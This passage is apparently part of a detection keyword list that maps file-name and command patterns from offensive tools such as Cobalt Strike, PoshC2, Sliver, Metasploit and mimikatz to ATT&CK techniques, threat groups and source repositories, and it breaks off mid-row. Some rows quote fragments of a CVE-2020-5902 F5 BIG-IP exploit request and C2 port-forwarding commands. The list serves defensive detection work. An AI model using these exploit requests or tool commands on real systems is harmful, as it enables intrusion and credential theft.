-*PortBender.zip*,offensive_tool_keyword,cobaltstrike,PortBender is a TCP port redirection utility that allows a red team operator to redirect inbound traffic ,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/praetorian-inc/PortBender,1,1,N/A,10,10,591,104,2023-01-31T09:44:16Z,2021-05-27T02:46:29Z -*portfwd add ?l *-p *-r *,offensive_tool_keyword,metasploit,metasploit command lines patterns,T1573.002 - T1043 - T1021,TA0001 - TA0002 - TA0003,N/A,N/A,Exploitation Tools,N/A,1,0,Port forwarding,10,10,N/A,N/A,N/A,N/A -*portfwd add --bind *,offensive_tool_keyword,sliver,Sliver is an open source cross-platform adversary emulation/red team framework,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002,TA0002 - TA0003 - TA0006 - TA0009,N/A,N/A,C2,https://github.com/BishopFox/sliver,1,0,N/A,10,10,6596,920,2023-10-03T20:36:09Z,2019-01-17T22:07:38Z -*portfwd add -r *,offensive_tool_keyword,sliver,Sliver is an open source cross-platform adversary emulation/red team framework,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002,TA0002 - TA0003 - TA0006 - TA0009,N/A,N/A,C2,https://github.com/BishopFox/sliver,1,0,N/A,10,10,6596,920,2023-10-03T20:36:09Z,2019-01-17T22:07:38Z -*portscan*,offensive_tool_keyword,portscan,A simple TCP and UDP portscanner written in Go,T1595 - T1596 - T1594,TA0007 - TA0009,N/A,N/A,Information Gathering,https://github.com/zs5460/portscan,1,0,N/A,N/A,1,13,4,2022-11-11T09:26:47Z,2019-06-04T09:00:00Z -*portscan.rc*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*portscan_result.cna*,offensive_tool_keyword,cobaltstrike,CrossC2 developed based on the Cobalt Strike framework can be used for other cross-platform system control. CrossC2Kit provides some interfaces for users to call to manipulate the CrossC2 Beacon session. thereby extending the functionality of Cobalt Strike.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/CrossC2/CrossC2Kit,1,1,N/A,10,10,155,25,2023-08-08T19:52:07Z,2022-06-06T07:00:10Z -*portscan386 *,offensive_tool_keyword,cobaltstrike,ServerScan is a high-concurrency network scanning and service detection tool developed in Golang.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/Adminisme/ServerScan,1,0,N/A,10,10,1430,218,2022-06-28T08:27:39Z,2020-04-03T15:14:12Z -*portscan64 *,offensive_tool_keyword,cobaltstrike,ServerScan is a high-concurrency network scanning and service detection tool developed in Golang.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/Adminisme/ServerScan,1,0,N/A,10,10,1430,218,2022-06-28T08:27:39Z,2020-04-03T15:14:12Z -*PortScan-Alive*,offensive_tool_keyword,AutoRDPwn,AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers,T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002,TA0004 - TA0003 - TA0006 - TA0002 - TA0008,N/A,N/A,Frameworks,https://github.com/JoelGMSec/AutoRDPwn,1,1,N/A,N/A,10,1009,830,2022-09-04T20:44:27Z,2018-07-29T08:22:20Z -*portscanner.js*,offensive_tool_keyword,beef,BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.,T1201 - T1505.003,TA0001 - TA0002,N/A,N/A,Frameworks,https://github.com/beefproject/beef,1,1,N/A,N/A,10,8794,2027,2023-09-30T17:06:35Z,2011-11-23T06:53:25Z -*portscanner.py*,offensive_tool_keyword,silenttrinity,SILENTTRINITY is modern. asynchronous. multiplayer & multiserver C2/post-exploitation framework powered by Python 3 and .NETs DLR. Its the culmination of an extensive amount of research into using embedded third-party .NET scripting languages to dynamically call .NET APIs. a technique the author coined as BYOI (Bring Your Own Interpreter). The aim of this tool and the BYOI concept is to shift the paradigm back to PowerShell style like attacks (as it offers much more flexibility over traditional C# tradecraft) only without using PowerShell in anyway.,T1043 - T1071 - T1059 - T1070 - T1570 - T1547 - T1548 - T1027 - T1562 - T1018,TA0002 - TA0008 - TA0003 - TA0004 - TA0005 - TA0007 ,N/A,N/A,POST Exploitation tools,https://github.com/byt3bl33d3r/SILENTTRINITY,1,1,N/A,N/A,10,2070,413,2023-07-08T19:10:18Z,2018-09-25T15:17:30Z -*Portscan-Port*,offensive_tool_keyword,AutoRDPwn,AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers,T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002,TA0004 - TA0003 - TA0006 - TA0002 - TA0008,N/A,N/A,Frameworks,https://github.com/JoelGMSec/AutoRDPwn,1,1,N/A,N/A,10,1009,830,2022-09-04T20:44:27Z,2018-07-29T08:22:20Z -*portScanWithService.py*,offensive_tool_keyword,viperc2,viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration,T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560,TA0002 - TA0003,N/A,N/A,C2,https://github.com/FunnyWolf/viperpython,1,1,N/A,10,10,70,41,2023-09-28T09:00:55Z,2021-01-20T13:03:45Z -*portScanWithService.py*,offensive_tool_keyword,viperc2,vipermsf Metasploit - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/FunnyWolf/vipermsf,1,1,N/A,N/A,1,78,37,2023-09-28T08:36:47Z,2021-01-20T13:08:24Z -*portswigger.net*,offensive_tool_keyword,burpsuite,Burp Suite is a leading range of cybersecurity tools. brought to you by PortSwigger. We believe in giving our users a competitive advantage through superior research. This tool is not free and open source,T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574,TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,Network Exploitation tools,https://portswigger.net/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*portswigger.net*,offensive_tool_keyword,burpsuite,Burp Suite is a leading range of cybersecurity tools. brought to you by PortSwigger. We believe in giving our users a competitive advantage through superior research. This tool is not free and open source,T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574,TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,Network Exploitation tools,https://portswigger.net/burp,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*posh_in_mem*,offensive_tool_keyword,Nuages,A modular C2 framework,T1027 - T1055 - T1071 - T1105 - T1566 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/p3nt4/Nuages,1,1,N/A,10,10,373,80,2023-10-02T23:24:19Z,2019-05-12T11:00:35Z -*posh_stageless.py*,offensive_tool_keyword,silenttrinity,SILENTTRINITY is modern. asynchronous. multiplayer & multiserver C2/post-exploitation framework powered by Python 3 and .NETs DLR. Its the culmination of an extensive amount of research into using embedded third-party .NET scripting languages to dynamically call .NET APIs. a technique the author coined as BYOI (Bring Your Own Interpreter). The aim of this tool and the BYOI concept is to shift the paradigm back to PowerShell style like attacks (as it offers much more flexibility over traditional C# tradecraft) only without using PowerShell in anyway.,T1043 - T1071 - T1059 - T1070 - T1570 - T1547 - T1548 - T1027 - T1562 - T1018,TA0002 - TA0008 - TA0003 - TA0004 - TA0005 - TA0007 ,N/A,N/A,POST Exploitation tools,https://github.com/byt3bl33d3r/SILENTTRINITY,1,1,N/A,N/A,10,2070,413,2023-07-08T19:10:18Z,2018-09-25T15:17:30Z -*Posh_v4_dropper_*,offensive_tool_keyword,poshc2,keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.,T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011,N/A,APT33 - HEXANE,C2,https://github.com/nettitude/PoshC2,1,1,N/A,10,10,1601,312,2023-09-08T05:42:06Z,2018-07-23T08:53:32Z -*Posh_v4_x64_*.bin*,offensive_tool_keyword,poshc2,keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.,T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011,N/A,APT33 - HEXANE,C2,https://github.com/nettitude/PoshC2,1,1,N/A,10,10,1601,312,2023-09-08T05:42:06Z,2018-07-23T08:53:32Z -*Posh_v4_x86_*.bin*,offensive_tool_keyword,poshc2,keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.,T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011,N/A,APT33 - HEXANE,C2,https://github.com/nettitude/PoshC2,1,1,N/A,10,10,1601,312,2023-09-08T05:42:06Z,2018-07-23T08:53:32Z -*PoshC2-*.zip*,offensive_tool_keyword,poshc2,keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.,T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011,N/A,APT33 - HEXANE,C2,https://github.com/nettitude/PoshC2,1,1,N/A,10,10,1601,312,2023-09-08T05:42:06Z,2018-07-23T08:53:32Z -*poshc2.server*,offensive_tool_keyword,poshc2,keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.,T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011,N/A,APT33 - HEXANE,C2,https://github.com/nettitude/PoshC2,1,1,N/A,10,10,1601,312,2023-09-08T05:42:06Z,2018-07-23T08:53:32Z -*poshc2.service*,offensive_tool_keyword,poshc2,keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.,T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011,N/A,APT33 - HEXANE,C2,https://github.com/nettitude/PoshC2,1,1,N/A,10,10,1601,312,2023-09-08T05:42:06Z,2018-07-23T08:53:32Z -*poshc2-ansible-main.yml*,offensive_tool_keyword,poshc2,PoshC2 is a proxy aware C2 framework used to aid penetration testers with red teaming. post-exploitation and lateral movement. PoshC2 is primarily written in Python3 and follows a modular format to enable users to add their own modules and tools. allowing an extendible and flexible C2 framework. Out-of-the-box PoshC2 comes PowerShell/C# and Python implants with payloads written in PowerShell v2 and v4. C++ and C# source code. a variety of executables. DLLs and raw shellcode in addition to a Python2 payload. These enable C2 functionality on a wide range of devices and operating systems. including Windows. *nix and OSX.,T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011,N/A,APT33 - HEXANE,C2,https://github.com/nettitude/PoshC2,1,1,N/A,10,10,1601,312,2023-09-08T05:42:06Z,2018-07-23T08:53:32Z -*posh-cookie-decryptor*,offensive_tool_keyword,poshc2,keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.,T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011,N/A,APT33 - HEXANE,C2,https://github.com/nettitude/PoshC2,1,1,N/A,10,10,1601,312,2023-09-08T05:42:06Z,2018-07-23T08:53:32Z -*posh-delete *,offensive_tool_keyword,poshc2,keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.,T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011,N/A,APT33 - HEXANE,C2,https://github.com/nettitude/PoshC2,1,0,N/A,10,10,1601,312,2023-09-08T05:42:06Z,2018-07-23T08:53:32Z -*poshkatz.psd1*,offensive_tool_keyword,mimikatz,Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Exploitation tools,https://github.com/Stealthbits/poshkatz,1,1,N/A,10,3,210,33,2019-12-28T15:53:40Z,2018-10-29T16:07:40Z -*posh-project *,offensive_tool_keyword,poshc2,keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.,T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011,N/A,APT33 - HEXANE,C2,https://github.com/nettitude/PoshC2,1,0,N/A,10,10,1601,312,2023-09-08T05:42:06Z,2018-07-23T08:53:32Z -*posh-project -*,offensive_tool_keyword,poshc2,PoshC2 is a proxy aware C2 framework used to aid penetration testers with red teaming. post-exploitation and lateral movement. PoshC2 is primarily written in Python3 and follows a modular format to enable users to add their own modules and tools. allowing an extendible and flexible C2 framework. Out-of-the-box PoshC2 comes PowerShell/C# and Python implants with payloads written in PowerShell v2 and v4. C++ and C# source code. a variety of executables. DLLs and raw shellcode in addition to a Python2 payload. These enable C2 functionality on a wide range of devices and operating systems. including Windows. *nix and OSX.,T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011,N/A,APT33 - HEXANE,C2,https://github.com/nettitude/PoshC2,1,0,N/A,10,10,1601,312,2023-09-08T05:42:06Z,2018-07-23T08:53:32Z -*posh-server -*,offensive_tool_keyword,poshc2,keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.,T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011,N/A,APT33 - HEXANE,C2,https://github.com/nettitude/PoshC2,1,0,N/A,10,10,1601,312,2023-09-08T05:42:06Z,2018-07-23T08:53:32Z -*posh-server -*,offensive_tool_keyword,poshc2,PoshC2 is a proxy aware C2 framework used to aid penetration testers with red teaming. post-exploitation and lateral movement. PoshC2 is primarily written in Python3 and follows a modular format to enable users to add their own modules and tools. allowing an extendible and flexible C2 framework. Out-of-the-box PoshC2 comes PowerShell/C# and Python implants with payloads written in PowerShell v2 and v4. C++ and C# source code. a variety of executables. DLLs and raw shellcode in addition to a Python2 payload. These enable C2 functionality on a wide range of devices and operating systems. including Windows. *nix and OSX.,T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011,N/A,APT33 - HEXANE,C2,https://github.com/nettitude/PoshC2,1,0,N/A,10,10,1601,312,2023-09-08T05:42:06Z,2018-07-23T08:53:32Z -*posh-update *,offensive_tool_keyword,poshc2,keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.,T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011,N/A,APT33 - HEXANE,C2,https://github.com/nettitude/PoshC2,1,0,N/A,10,10,1601,312,2023-09-08T05:42:06Z,2018-07-23T08:53:32Z -*POST */tmui/login.jsp/.. /tmui/locallb/workspace/fileSave.jsp*,offensive_tool_keyword,POC,exploit code for F5-Big-IP (CVE-2020-5902),T1210,TA0008,N/A,N/A,Exploitation tools,https://github.com/jas502n/CVE-2020-5902,1,0,N/A,N/A,4,377,112,2021-10-13T07:53:46Z,2020-07-05T16:38:32Z -*POST *fileName=/tmp/1.txt&content=CVE-2020-5902*,offensive_tool_keyword,POC,exploit code for F5-Big-IP (CVE-2020-5902),T1210,TA0008,N/A,N/A,Exploitation tools,https://github.com/jas502n/CVE-2020-5902,1,0,N/A,N/A,4,377,112,2021-10-13T07:53:46Z,2020-07-05T16:38:32Z -*post/windows/gather*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*post_breach_handler.py*,offensive_tool_keyword,monkey,Infection Monkey - An automated pentest tool,T1587 T1570 T1021 T1072 T1550,N/A,N/A,N/A,Exploitation tools,https://github.com/guardicore/monkey,1,1,N/A,N/A,10,6330,762,2023-10-03T21:06:53Z,2015-08-30T07:22:51Z -*post_ex_amsi_disable*,offensive_tool_keyword,cobaltstrike,Cobalt Strike random C2 Profile generator,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/threatexpress/random_c2_profile,1,1,N/A,10,10,544,83,2023-01-05T21:17:00Z,2021-04-03T20:39:29Z -*post_ex_keylogger*,offensive_tool_keyword,cobaltstrike,Cobalt Strike random C2 Profile generator,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - 